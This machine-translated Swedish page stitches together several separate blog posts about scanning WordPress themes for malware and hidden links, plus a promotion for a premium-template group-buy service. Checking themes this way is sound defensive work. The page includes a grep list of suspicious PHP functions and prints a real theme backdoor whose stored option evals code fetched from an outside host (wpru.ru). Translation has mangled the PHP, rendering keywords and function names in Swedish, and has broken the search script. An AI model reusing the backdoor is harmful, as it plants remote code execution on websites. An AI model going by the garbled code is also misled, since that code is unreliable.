Kontrollera mallen för skadlig kod. Så här ändrar du en WordPress-mall för dig själv: kontrollera malllayouten enligt SEO-regler
Läs också
WordPress är den mest populära motorn för att skapa olika informationswebbplatser och bloggar. Säkerheten för din webbplats är mer än säkerheten för din data. Detta är mycket viktigare, eftersom det också är säkerheten för alla användare som läser och litar på din resurs. Det är därför det är så viktigt att webbplatsen inte är infekterad med virus eller annan skadlig kod.
Vi kommer att titta på hur man skyddar WordPress från hackning i någon av följande artiklar, men nu vill jag berätta hur man kontrollerar en WordPress-webbplats för virus och skadlig kod för att se till att allt är säkert.
Det allra första alternativet som kommer att tänka på är att du blev hackad av hackare och byggde in deras bakdörrar i koden på din webbplats för att kunna skicka spam, lägga länkar och andra dåliga saker. Detta händer ibland, men detta är ett ganska sällsynt fall om du uppdaterar programvaran i tid.
Det finns tusentals gratis WordPress-teman och olika plugins, och detta kan redan vara ett hot. Det är en sak när du laddar ner en mall från WordPress-webbplatsen och en helt annan när du hittar den på den vänstra sidan. Skrupelfria utvecklare kan bädda in olika skadliga koder i sina produkter. Risken är ännu större om du laddar ner premiummallar gratis, där hackare utan att riskera något kan lägga till något slags säkerhetshål som de sedan kan tränga igenom och göra vad de behöver. Det är därför det är så viktigt att kontrollera en WordPress-webbplats för virus.
Kontrollerar en WordPress-webbplats för virus
Det första du behöver vända dig till när du kontrollerar en sida är inte virus, det är WordPress-plugins. Snabbt och enkelt kan du skanna din webbplats och hitta misstänkta kodområden som är värda att uppmärksamma, oavsett om de finns i temat, plugin-programmet eller själva kärnan i Wodpress. Låt oss titta på några av de mest populära plugins:
1.TOC
Denna mycket enkla plugin kontrollerar alla teman som är installerade på din webbplats för att se om de innehåller skadlig kod. Insticksprogrammet upptäcker dolda länkar krypterade med hjälp av base64-kodinfogning, och visar även detaljerad information om de problem som hittats. Oftast är de kodbitar som hittas inte virus, men de kan potentiellt vara farliga, så du bör vara uppmärksam på dem.
Öppen "Utseende" -> "TAC" vänta sedan tills alla ämnen är kontrollerade.
2. VIP-skanner
Mycket lik TOC topic scanner, men visar mer detaljerad information. Samma möjligheter för att upptäcka länkar, dold kod och andra skadliga infogningar. Öppna bara VIP Scanner-objektet i verktygssektionen och analysera resultatet.
Det kan räcka med att radera onödiga filer, till exempel desktop.ini. Eller så måste du titta mer i detalj på vad som händer i filer med base64.
3. Anti-Malware från GOTMLS.NET
Denna plugin låter dig inte bara skanna teman och kärnan på webbplatsen efter virus, utan också för att skydda webbplatsen från brute force-lösenord och olika XSS, SQLInj-attacker. Sökningen utförs baserat på kända signaturer och sårbarheter. Vissa sårbarheter kan åtgärdas på plats. För att börja skanna filer, öppna "Anti-Malvare" i sidomenyn och klicka "Kör skanning":
Innan du kan köra en skanning måste du uppdatera dina signaturdatabaser.
4. Wordfence
Detta är en av de mest populära plugins för WordPress-säkerhet och skanning av skadlig programvara. Utöver skannern, som kan hitta de flesta bokmärken i WordPress-koden, finns ett ständigt skydd mot olika typer av attacker och lösenordsbrute force. Under sökningen hittar pluginen möjliga problem med olika plugins och teman och rapporterar behovet av att uppdatera WordPress.
Öppna fliken "WPDefence" i sidomenyn och gå sedan till fliken "Skanna" och tryck "Starta skanning":
Skanningen kan ta lite tid, men när den är klar kommer du att se en detaljerad rapport över de problem som hittats.
5. Antivirus
Detta är ett annat enkelt plugin som kommer att skanna din webbplatsmall efter skadlig kod. Nackdelen är att endast den aktuella mallen skannas, men informationen visas tillräckligt detaljerat. Du kommer att se alla farliga funktioner som finns i temat och sedan kan du analysera i detalj om de utgör någon fara. Hitta ett föremål "Antivirus" i inställningar och klicka sedan "Skanna temamallarna nu":
6. Integritetskontroll
Det är också tillrådligt att kontrollera integriteten hos WordPress-filer, om viruset redan har skrivit någonstans. Du kan använda plugin-programmet Integrity Checker för detta. Den kontrollerar alla kärn-, plugin- och mallfiler för ändringar. I slutet av skanningen kommer du att se information om de ändrade filerna.
Online tjänster
Det finns också flera onlinetjänster som låter dig kontrollera en WordPress-sajt för virus eller kolla bara mallen. Här är några av dem:
themecheck.org- du laddar ner temaarkivet och kan se alla varningar om möjliga skadliga funktioner som används i det. Du kan inte bara se information om ditt tema, utan också om andra teman som laddats upp av andra användare, såväl som olika versioner av temat. Vad pluginsen än hittar kan hittas av den här webbplatsen. Att kontrollera ditt WordPress-tema är också mycket viktigt.
virustotal.com- en välkänd resurs där du kan kontrollera din webbplats eller mallfil för virus.
ReScan.pro- att skanna en WordPress-webbplats efter virus med den här tjänsten är gratis; statisk och dynamisk analys utförs för att upptäcka möjliga omdirigeringar; skannern öppnar webbplatsens sidor. Kontrollerar sidan mot olika svarta listor.
sitecheck.sucuri.net- en enkel tjänst för att skanna webbplatser och ämnen efter virus. Det finns ett plugin för WordPress. Upptäcker farliga länkar och skript.
Manuell kontroll
Ingenting kan vara bättre än manuell kontroll. Linux har detta underbara grep-verktyg som låter dig söka efter förekomster av godtyckliga strängar i en mapp med filer. Det återstår att förstå vad vi kommer att leta efter:
eval - den här funktionen låter dig exekvera godtycklig PHP-kod, den används inte av produkter med självrespekt, om en av plugins eller ett tema använder den här funktionen är det nästan 100% sannolikhet att det innehåller ett virus;
- base64_decode- Krypteringsfunktioner kan användas tillsammans med eval för att dölja skadlig kod, men de kan också användas för fredliga syften, så var försiktig;
- sha1- en annan metod för att kryptera skadlig kod;
- gzinflate- komprimeringsfunktion, samma mål, tillsammans med eval, till exempel, gzinflate(base64_decode(code);
- strrev- vänder linjen bakåt inte tidigare, eftersom ett alternativ kan användas för primitiv kryptering;
- skriva ut- matar ut information till webbläsaren, tillsammans med gzinflate eller base64_decode är det farligt;
- file_put_contents– WordPress i sig eller plugins kan fortfarande skapa filer i filsystemet, men om temat gör detta bör du vara försiktig och kolla varför det gör detta, eftersom virus kan installeras;
- file_get_contents- i de flesta fall används för fredliga syften, men kan användas för att ladda ner skadlig kod eller läsa information från filer;
- ringla- samma historia;
- fopen- öppnar en fil för att skriva, du vet aldrig i vilket syfte;
- systemet- funktionen kör ett kommando på ett Linux-system, om ett tema, plugin eller wordpress själv gör detta, finns det troligen ett virus där;
- symbollänk- skapar symboliska länkar i systemet, kanske viruset försöker göra huvudfilsystemet tillgängligt utifrån;
- kopiera- kopierar en fil från en plats till en annan;
- getcwd- returnerar namnet på den aktuella arbetskatalogen;
- cwd- ändrar den aktuella arbetsmappen;
- ini_get- får information om PHP-inställningar, ofta i fredliga syften, men man vet aldrig;
- error_reporting(0)- inaktiverar utmatningen av eventuella felmeddelanden;
- window.top.location.href- Javascript-funktion som används för omdirigeringar till andra sidor;
- hackad- så, för säkerhets skull, kollar vi, plötsligt, beslutade hackaren själv att berätta för oss.
Du kan ersätta varje enskilt ord med ett kommando så här:
grep -R "hackad" /var/www/path/to/files/wordpress/wp-content/
Eller använd ett enkelt skript som söker efter alla ord samtidigt:
värden="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
kopiera(
eval(
systemet(
symbollänk(
error_reporting(0)
skriva ut
file_get_contents(
file_put_contents(
fopen(
hackad"
cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$värden" *
Hej kära läsare av bloggsidan. Nuförtiden är det få webbansvariga som designar sin webbplats själva (med ren HTML, sin egen motor, eller åtminstone använder självskapade mallar för CMS). I allmänhet är detta sant, eftersom inte alla kan skapa något värdefullt - detta kräver en designers talang. Oftast visar det sig vara åtminstone "inte särskilt bra", och ibland "helt enkelt hemskt".
Det är därför mallar eller designteman (i olika motorer kan "skins" hänvisas till med olika termer) för populära CMS har blivit så utbredda. Särskilt mycket av denna godhet kan hittas på internet för Joomla och WordPress, eftersom det med rätta är så, både i RuNet och på det borgerliga internet.
Egentligen finns det redan en hel del ryskspråkiga resurser med kataloger med färdiga mallar. Tja, i bourgeoisin finns det inget sätt att räkna dem. Allt verkar så underbart - installera motorn, hitta en lämplig mall (det är ingen hemlighet att betalda mallar inte är så svåra att hitta gratis), ladda ner den och njut av den professionella designen på din nya webbplats. Allt som återstår är att lägga till värdefullt innehåll till den och du kommer att kunna se hur din resurs popularitet växer på Internet.
Men allt är inte så enkelt och självklart. När jag skrev en artikel för länge sedan fick jag ganska regelbundet från läsare per post rekommendationer om att ta bort den eller den tjänsten från listan, för i de som postats där dolda länkar eller till och med virus finns i mallar. Det visar sig att ordspråket är sant - fri ost kan bara hittas i en råttfälla. Utvecklare av gratis mallar (eller de som "noll" betalade sådana) tjänar helt enkelt pengar på detta sätt och, att döma av omfattningen, mycket av det.
Dolda länkar till tredje parts (och ofta svartlistade av sökmotorer) resurser, och ännu mer virus, kan döda alla förhoppningar om att marknadsföra din resurs (eller allvarligt undergräva dem och förstöra dina nerver). För detta kan du antingen. Hur kan du skydda dig från allt detta när du väljer mall?
Vad är det för fel med gratis mallar för Joomla och WordPress?
Av egen erfarenhet kan jag säga att det är väldigt svårt för en "amatör" att konkurrera med en "proffs". Allra i början av den här publikationen gav jag en länk till en artikel om virus som infekterade de flesta av mina webbplatser. Detta hände för mer än två år sedan, och under den här tiden har jag upprepat den episka kampen för "kodrenhet" mer än en gång, men återfall inträffar fortfarande med avundsvärd regelbundenhet på ett antal infekterade resurser (antingen skickas skräppost från dem, eller en dörröppningen bildas, sedan händer något helt obegripligt för mig, vilket leder till en monstruöst stor belastning på hosting).
Samtidigt använder jag alla metoder som är tillgängliga för en "noob" för att söka efter skal och andra bakdörrar i koden för dessa webbplatser, men återigen, jag upprepar att en amatör helt enkelt inte kan konkurrera med ett proffs. Därför, om du tror att du enkelt kan ta bort ett virus som har smugit igenom en mall, så har du troligen fel. Detta är en väldigt trist, fruktansvärt irriterande sak (när viral aktivitet, trots alla dina ansträngningar, dyker upp om och om igen) och tar mycket tid och ansträngning.
Det samma gäller även dolda länkar. Det är bra om du stöter på ett alternativ för att introducera dem från en tidigare era, när du helt enkelt kunde hitta platsen att sätta in dem och bli av med dem för alltid, och i slutändan få en ren och gratis mall. I de flesta fall är allt mycket mer komplicerat. För att hitta var du ska infoga dolda länkar behöver du programvara (till exempel TAC-plugin), men den är inte allsmäktig, eftersom verksamheten med att distribuera länkar genom gratis och betalda (hackade) mallar för Joomla och WordPress ger mycket goda intäkter, vilket uppmuntrar människor som praktiserar det att söka nya lösningar som gör deras "bokmärke" mindre märkbart.
Idag kan det faktiskt vara ganska svårt att ens snabbt kolla en mall för att generera "vänsterlänkar". Till exempel laddade du ner en mall, placerade den på webbplatsen, lade till innehåll och bestämde dig för att se om några misstänkta externa länkar (inte inlagda av dig) dök upp från den. Det finns ingen av dem. Du är glad, glöm det här problemet, är upptagen med att fylla sidan och marknadsföra den, och plötsligt upptäcker du av misstag (på egen hand eller efter en signal från sökmotorer i form av ett filter eller förbud) att det fortfarande finns dolda länkar och de leder till sådan "muck", som du själv aldrig ens skulle kunna tänka dig att hänvisa till.
Det mest kränkande med det här är det att ta bort filtret och "vita" webbplatsen i sökmotorernas ögon Det kan ta väldigt lång tid (månader och till och med år i vissa fall). Men poängen här är att utvecklarna av sådana "bokmärken" är medvetna om att du känner till dem och kontrollerar webbplatsen efter att ha installerat mallen för "alla möjliga dåliga överdrifter." Därför saktar de ner början av att generera just dessa länkar under en tid, tillräckligt enligt deras åsikt för att även den mest misstänksamma användaren ska tro på renheten hos mallen han fick gratis.
Dessutom är dolda länkar nu kodade på ett sådant sätt att de inte genomsöks med orden md5 eller base64 (ofta laddas de från en extern källa). Bara en uppsättning bokstäver och specialtecken som inte kan hittas genom att söka igenom alla mallfiler. Och det kan finnas mer än hundra av dessa filer. Dessutom visas inte länkar omedelbart. Det vill säga, i själva verket är det omöjligt för en webbansvarig (genomsnittet) att upptäcka dem vid skapandet av en webbplats.
Tja, för att undvika infektion genom mallen, jag Jag föredrar att betala pengar för att inte behöva ta itu med en massa problem senare. En annan sak är att du kan betala mycket pengar, eller så kan du inte betala särskilt mycket. Jag väljer personligen det andra alternativet, men först ska jag förklara essensen av det första.
Något kan man förstås hitta och i de officiella förråden för dessa motorer(läs om det och gå till den officiella webbplatsen för tillägg för Joomla), men för det första är valet där betydligt begränsat, och för det andra kommer många tusen fler sajter runt om i världen att vara klädda i samma "kläder", vilket minskar något det unika med ditt projekt både i besökarnas ögon och i sökmotorernas ögon.
Det finns dock många professionella företag i världen som utvecklar betalmallar för Joomla och WordPress. A priori (), bör de inte ha bokmärken, annars kommer de omedelbart att förlora auktoritet och förtroende hos kunder. Priset för en mall kan dock vara 50-100 dollar, beroende på dess funktionalitet och nyhet.
Dessutom kan vissa problem med betalningen uppstå (du måste antingen ta en risk och göra ett köp med betalning direkt från ett plastkort). Men som ett resultat kommer du att få en medvetet "ren" mall, vilket är bra. Det är sant att den tekniska supporten som följer med den kommer att vara relevant endast om du kan språket som den tillhandahålls på. I de flesta fall kommer kunskaper om det ryska språket inte att hjälpa dig i denna fråga.
Jag gillar det andra alternativet bättre på grund av dess högre lönsamhet (förhållandet mellan spenderade pengar och mottagna möjligheter), även om det i förhållande till utvecklare inte är helt "vitkalkat". Dess kärna är att Joomla och WordPress distribueras under en GNU/GPL-licens, dvs. licenser för fri programvara (sådan programvara kan användas, kopieras, modifieras och distribueras). Egentligen har jag redan skrivit om detta tidigare i artikeln om Joomla-mallar som nämndes i början.
Utan att gå in på för mycket detaljer, är poängen att tillägg (mallar, plugins, etc.) för dessa motorer inte kan vara författarnas privata egendom. Ja, du kan kräva betalning för dem, men det kommer inte längre att vara möjligt att straffa eller åtala för otillåten användning eller distribution av dessa tillägg. Trots detta är marknaden för betalda tillägg för Joomla och WordPress enorm inte skyddas av upphovsrättslagen. Tvärtom, GNU/GPL-licensen skyddar dig till 100% från utvecklaren.
Många utvecklingsföretag ger för övrigt tillgång till sina mallar genom prenumeration. De där. du betalar ett visst belopp och under en viss tid kan du ladda ner och fortsätta använda alla deras skapelser (mallar eller tillägg) löpande. Egentligen är det andra sättet att säkert skaffa teman för WordPress, såväl som mallar för Joomla, baserat på ungefär samma princip.
För inte så länge sedan, min vän, som jag nämnde i ett antal artiklar, "pekade fingret på honom" (han har letat efter det perfekta alternativet för att bygga en onlinebutik i flera år, och längs denna väg hittar han många saker som verkar intressanta för mig och som används aktivt i framtiden). Vi pratar om att slå ihop premiummallar och tillägg CmsHeaven.org .
Kärnan i insamlingen är ganska enkel - köp en produkt och distribuera den till alla som deltog i insamlingen. CmsHeaven.org har förenklat schemat ännu mer - det finns inget behov av att betala för individuella mallar eller tillägg som du behöver. Du betalar helt enkelt för tillfällig tillgång till hela katalogen som denna tjänst har till sitt förfogande (flera tusen titlar, uppdelade för att underlätta sökningen efter motorer, författare och ämnen).
Var och en av de presenterade produkterna köptes ärligt från utvecklarna med insättarnas pengar (det finns också gratis mallar, men återigen presenteras de av välkända varumärken som de behöver för reklamsyften). Och vad som är viktigt, arrangörerna uppdaterar ständigt katalogen med nya exemplar (i stundens hetta, som de säger), som kommer att behöva vänta länge i allmänheten. Många människor kommer att gilla detta.
Generellt sett är detta ett kooperativ där du kan gå med och njuta av alla förmåner. Men med vissa restriktioner. Faktum är att arrangörerna är väl medvetna om att utan att införa restriktioner kommer hela deras katalog att läcka ut till allmänheten inom en tidsfråga. Därför äger det rum gräns till 36 nedladdningar per månad. Detta är tillräckligt för en vanlig webmaster, och till och med ett företag som skapar webbplatser.
Detta garanterar frånvaro i de presenterade tilläggen och mallarna "bokmärken"(dolda länkar, virus, trojaner och snokar som informerar utvecklaren om webbplatsen med hjälp av deras mall). Med tanke på detta köps endast produkter från välkända varumärken med öppen källkod, där allt detta kan kontrolleras och vid behov elimineras.
En del av tilläggen har översatts till ryska, och om problem uppstår med installation eller konfiguration, vilket ofta är mycket nödvändigt (du har förmodligen kammat Internet mer än en gång i jakten på en lösning på ett problem som uppstod direkt) . Det är förresten det som skiljer gratismotorer från betalda, att det inte finns något användarstöd som sådant.
Och du kommer att kunna ladda ner de produkter du gillar i normal hastighet och utan att se annonser på filvärdtjänster. Det är en bagatell, för för att få den eftertraktade "söta" kan du flytta berg, och inte bara slåss med en filvärdtjänst, utan det är småsakerna som utgör komforten.
I allmänhet gillade jag idén och dess implementering, men ska jag använda gratis mallar från Joomla och WordPress repositories, ska jag gå med på CmsHeaven.org eller köpa mallar direkt från utvecklarna? du får bestämma själv. Bara "Jag ber dig, ät inte råa tomater på natten", det vill säga ladda inte ner gratisprodukter från några "underbara" resurser, eftersom du kan få många problem. Behöver du det?
Lycka till! Vi ses snart på bloggsidans sidor
Du kanske är intresserad
Hur man infogar besöksräknarkod i en webbplats som kör Joomla med hjälp av modulen anpassad HTML-kod eller direkt i en mall 
Hur skapar man en professionell visitkortswebbplats själv utan kunskap om HTML, CSS och PHP? Svar: MotoCMS! 
Hur man får en adaptiv mall för en framtida webbplats, och med den ett intuitivt och snabbt CMS att starta upp 
10 dödliga misstag när du skriver och publicerar artiklar 
Skapa en menypost i Joomla för att komma in i forumet och överföra användarregistrering från SMF till webbplatsen 
Ställer in JFusion för att kombinera SMF-forumet och Joomla-webbplatsen 
JFusion-moduler för att visa meddelanden från forumet på webbplatsen, samt skapa en knapp i SMF för att återgå till Joomla WebPoint PRO är ett responsivt WordPress-tema med bred funktionalitet och kompetent teknisk sökmotoroptimering 
Share42 - ett skript för att lägga till sociala nätverksknappar och bokmärken till webbplatsen (det finns ett alternativ för flytande panel) 
Installera SMF Forum - Integrering av Joomla 1.5 och Simple Machines Forum med JFusion-komponenten
Ett av de viktigaste stegen när du skapar en blogg är att välja en mall av hög kvalitet. Det finns många sajter, både betalda och gratis. Du måste dock vara försiktig här, eftersom det finns en stor sannolikhet att ta emot virus, skadliga skript och dolda länkar tillsammans med filen.
Men även om mallen är ren säkerhetsmässigt, och du är helnöjd med dess design, användbarhet och funktionalitet, betyder det inte att allt är i sin ordning. Temat måste ha giltig HTML- och CSS-kod och även uppfylla alla WordPress CMS-standarder.Även betalda teman och skräddarsydda mallar har problem med det senare.
Motorutvecklare utvecklar det hela tiden, och mallförfattare hänger inte alltid med i dem och använder föråldrade funktioner när de skapar dem.
Idag kommer jag att visa dig två sätt att kontrollera WordPress-teman för efterlevnad av standarder. Dessa verktyg används när de läggs till i den officiella katalogen https://wordpress.org/themes/
Tjänst för att kontrollera WordPress-teman och Joomla-mallar för överensstämmelse med standarder
ThemeCheck.org är en gratistjänst som låter dig kontrollera säkerheten och kvaliteten på mallar för CMS WordPress och Joomla innan du installerar dem på din webbplats.
För att kontrollera ett tema, ladda ner dess arkiv från din dator genom att klicka på knappen "Välj fil" på themecheck.org. Om du inte vill att skanningsresultaten ska sparas på tjänsten och vara tillgängliga för andra användare, markera " Glöm uppladdade data efter resultat". Klicka nu på knappen "Skicka".
Jag tog till exempel ämnet Gränssnitt, som jag laddade ner från den officiella webbplatsen. 99 av 100 – 0 kritiska fel och 1 varning. Detta är ett mycket bra resultat.
Som jämförelse fick min bloggmall poängen 0 (14 fel och 23 varningar). Jag tror att resultaten för många inte kommer att vara mycket annorlunda, särskilt om ämnena redan är föråldrade. Alla anteckningar med förklaringar som anger filerna och raderna där de hittades finns på samma sida nedan.
Uppriktigt sagt förstod jag inte mycket där; det skulle vara mer användbart för författare, och det är lättare för mig att ändra mallen än att fixa allt. Jag vet bara inte när jag bestämmer mig för att göra det här.
På Home finns ett stort urval av tidigare testade WordPress och Joomla webbteman med möjlighet att sortera efter tillagd tid eller betyg. När du klickar på dem kan du se detaljerad information och länkar till författarens webbplats och nedladdningssida.
Om du är en utvecklare och ditt tema är 100 % giltigt kan du informera användarna om detta genom att installera ett speciellt märke med ett betyg på.
Värdet med tjänsten ThemeCheck.org är att alla webbansvariga kan använda den för att välja ett högkvalitativt tema innan det installeras på bloggen.
Theme Check plugin
Du kan kontrollera en redan installerad mall för kompatibilitet med de senaste WordPress-standarderna med hjälp av Theme Check-plugin. Länk för att ladda ner den senaste versionen: https://wordpress.org/plugins/theme-check/
Funktionaliteten hos pluginet liknar tjänsten jag beskrev ovan. Det finns ingen anledning att göra några inställningar efter standardinstallation och aktivering. Kontrollera proceduren:
- Gå till adminpanelen till menysidan "Utseende" - "Temakontroll".
- Välj önskat tema från rullgardinsmenyn om du har flera installerade.
- Markera kryssrutan "Undertryck INFO" om du inte vill skicka information.
- Klicka på knappen "Kontrollera det".
Resultaten kommer att visas på samma sida.
Som du kan se, standardtemat Tjugohundratio Det är inte heller idealiskt, men t.ex. Tjugo fjorton har inga fel.
Efter kontroll kan plugin-programmet inaktiveras, eller ännu bättre, tas bort helt till nästa gång.
Slutsats. Innan du installerar en ny WordPress-mall, kontrollera den inte bara för dolda länkar och skadlig kod med TAC-plugin, utan även med ThemeCheck.org-tjänsten eller Theme Check-plugin för överensstämmelse med de senaste CMS-standarderna.
P.S. Nyligen, när jag surfade i TopSape Reader, såg jag en ny SEO-blogg zenpr.ru, som har 1:a plats bland bloggare när det gäller klick per månad. Med tanke på att han är drygt en månad gammal är resultatet värt respekt. Designen är i stil med minimalism, om inte att säga att den inte existerar alls, men författaren skriver - du kommer att läsa den. Allt till punkt och utan vatten. Precis som i bloggtiteln - "noll extra tecken." Jag rekommenderar att du läser den, du kommer att hitta mycket användbar information.
Hej kompisar. Är du säker på att den kostnadsfria WordPress-mallen du använder för dina webbplatser och bloggar är verkligen säker och inte innehåller dolda hot eller skadlig kod? Är du helt säker på detta? Absolut?)
Du tror att du körde mallen genom , tog bort dolda länkar från den och jobbet är klart. Du skannar med jämna mellanrum webbplatsens filer med ett antivirusprogram, tittar på Yandex webbansvariga på fliken Säkerhet och är lättad över att se meddelandet där: " Ingen skadlig kod upptäcktes på webbplatsen«.
Så tänkte jag också. Jag skulle inte vilja göra dig upprörd, men...
Dold farlig kod i gratis WordPress-mallar
Det här är brevet jag fick förra veckan via e-post från mitt webbhotell. Nyligen har de infört en regelbunden kontroll av alla webbplatsfiler för att leta efter skadligt innehåll, och de hittade det här innehållet på mig!
Det hela började när jag gick till min webbplats en eftermiddag och inte kunde starta den – ett missbrukande meddelande dök upp om att filer med php-tillägget inte kunde hittas. Efter att ha spänt mig lite gick jag för att studera innehållet i mappen med webbplatsen på webbhotellet och upptäckte omedelbart ett problem - min mallfil fuctions.php bytte namn till functions.php.malware, vilket tycktes vara en tvetydig antydan - ett antivirus var jobbar här eller något sånt) Efter att ha gått till posten hittade jag ovanstående rapport från värden.
Det första jag gjorde var naturligtvis att börja kontrollera den här filen, studera dess innehåll, skanna den med alla typer av antivirus, dussintals viruskontrolltjänster online, etc. — till slut hittades ingenting, alla hävdade enhälligt att filen var helt säker. Naturligtvis uttryckte jag mina tvivel till värden och sa att du hade förstört något, men för säkerhets skull bad jag dem lämna en rapport om upptäckten av en skadlig kod.
Och detta är vad de svarade mig
Jag gick till google information om den här koden och tänkte allvarligt...
Hur man hittar en bit skadlig kod i en mall
Som det visar sig är detta en verkligt icke-trivial teknik som tillåter intresserade parter att överföra data till din webbplats och ändra innehållet på sidor utan din vetskap! Om du använder en gratis mall, då Jag rekommenderar starkt att du kontrollerar din functions.php efter följande kod:
add_filter('the_content', '_blogginfo', 10001);
function _bloginfo($content)(
global $post;
if(is_single() && ($co=@eval(get_option(‘bloggoption’))) !== false)(
returnera $co;
) annars returnerar $content;
}
Även med min mycket grunda kunskap om PHP är det tydligt att ett visst filter skapas, knutet till den globala variabeln post och innehåll, som är ansvariga för att visa innehåll endast på blogginläggssidor (is_single condition). Är det redan misstänkt? Nåväl, låt oss nu se vad den här koden kommer att visa på vår webbplats.
Det intressanta alternativet bloggoption som efterfrågas i databasen ser också väldigt misstänkt ut. Vi går in i vår MySQL-databas och hittar en tabell där som heter wp_options, om du inte ändrade prefixen så kommer det se ut så här som standard. Och i den hittar vi den linje som intresserar oss som kallas blogoption
Vilken skönhet! Vi ser följande alternativ
return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));
De där. Från en viss sida (och en rysk, märk väl) returnerar de innehåll som kan innehålla vad som helst! Valfritt antal länkar, skadliga koder, ändrad text, etc. När du går in på själva webbplatsen ger det dig ett 403 åtkomstfel, vilket inte är förvånande. Naturligtvis tog jag också bort det här alternativet från databasen.
Enligt information från offer returneras det exakta innehållet i din artikel vanligtvis med endast en modifiering - istället för någon punkt "." en öppen länk gömdes i texten! Och förresten, det här alternativet skrivs till databasen när själva mallen är installerad, och sedan förstör koden som gör detta framgångsrikt själv. Och jag levde med sådant skräp i två år, och inte ett enda antivirus eller tjänst identifierade detta hot mot mig under hela den tiden. För att vara ärlig märkte jag inte om det här tricket någonsin fungerade för mig, eller om mitt säkerhetsplugin blockerade den här funktionen (eller kanske en av WordPress-uppdateringarna stängde det här hålet), men det är fortfarande obehagligt.
Moral om gratis ost
Hur tycker du om sofistikeringen hos våra "översättare" av mallar (eller de som lägger upp dem i sina kataloger)? Det här är inte för dig att klippa ut länkar från sidfoten) Det är synd att jag inte kommer ihåg var jag laddade ner min mall ifrån, det var länge sedan, annars hade jag definitivt skrivit ett par tillgivna. Och om jag vid den tiden hade samma erfarenhet som jag har nu, skulle jag definitivt inte ha använt en gratis mall, eller, i extrema fall, inte ha laddat ner den från okända källor!
Det är lättare att köpa någon officiell premiummall för 15-20 spänn och leva i fred, med vetskapen om att det inte finns några hål eller krypterade länkar i den, och även om det finns sårbarheter kommer utvecklarna definitivt att släppa en uppdatering där dessa hål kommer att finnas. stängd. ( Artem publicerade förresten nyligen en artikel där han pratar om premiummallar och till och med delar ut kampanjkoder för brutala rabatter för den som är intresserad)
Hej IdeaFox vänner!
Jag vet inte om dig, men jag har svårt att sova på nätterna. Jag plågas av säkerhetsproblem på bloggen. Jag orkar inte längre :-)
Jag läste ett gäng bloggar om detta ämne och testade många plugins som hjälper till att lösa detta problem. Och i kommentarerna började de ställa frågor om ämnet platsskydd, vilket fick mig att skriva denna anteckning.
Föreställ dig bara att du håller en blogg, skriver artiklar, försöker... Och onda idioter kommer och slår sönder din sida. Jag tror att det kommer att bli mycket sorg.
När allt kommer omkring investerar varje normal bloggare mycket tid och ansträngning på utvecklingen av sin webbplats. Och för många blir bloggandet i allmänhet en besatthet... Här och tills, om DET händer :-)
Tja, du förstår hur viktigt det här är.
Nu ska vi äntligen börja jobba :)
För ett par månader sedan skrev jag redan en anteckning om hacking. Se till att läsa den. Men det har gått ganska lång tid sedan dess och jag vidtog ytterligare åtgärder för att stärka allroundförsvaret.
I följande anteckningar kommer jag definitivt att uppehålla mig i denna fråga i detalj. (Jag kommer också ihåg och skriver om ISP-inställningar)
3. Kontrollera webbplatsen på andra onlinetjänster
Det finns ingen brist på sådana tjänster. Jag har en stark uppfattning att många av dem är helt korkade och skapade enbart för att visa reklam.
Doktor Web
Företaget DR.Web har gjort en bra tjänst för att kolla sajter online. Personligen hjälpte han mig en gång att hitta en infektion på en väns blogg (det fanns tredjepartskod i .htaccess-filen)
Kontrollen är mycket enkel. Ange din URL och vänta på verifieringsresultatet.
antivirus-alarm.ru
En kraftfull webbläsare som använder så många som 43 antivirusdatabaser från världens ledande antivirusföretag.
Allt är väldigt enkelt även här. Vi anger webbadressen till vår sajt och väntar med hållna andetag på skanningsresultaten.
Jag har väntat på dessa.
Allt är rent, du kan sova lugnt :-)
Allt detta är naturligtvis bra, men du måste också installera ett par plugins som inte skadar alls för WordPress-bloggar.
4. Be din värd att kontrollera din webbplats
Faktum är att värdar är ännu mer bekymrade över säkerhetsfrågor än du och har kraftfulla säkerhetsåtgärder. Dessutom med specialiserade skyddsmedel.
Det här är nyheterna jag har för dig idag. Därefter kommer jag att berätta om ett mycket kraftfullt plugin som avsevärt kan skydda din WordPress-blogg från hackning.
Jag har redan jobbat med honom i 2 månader och är väldigt nöjd med honom. Medan jag kom på det så banade jag mig själv 3 gånger: –) Kort sagt, det finns något att berätta.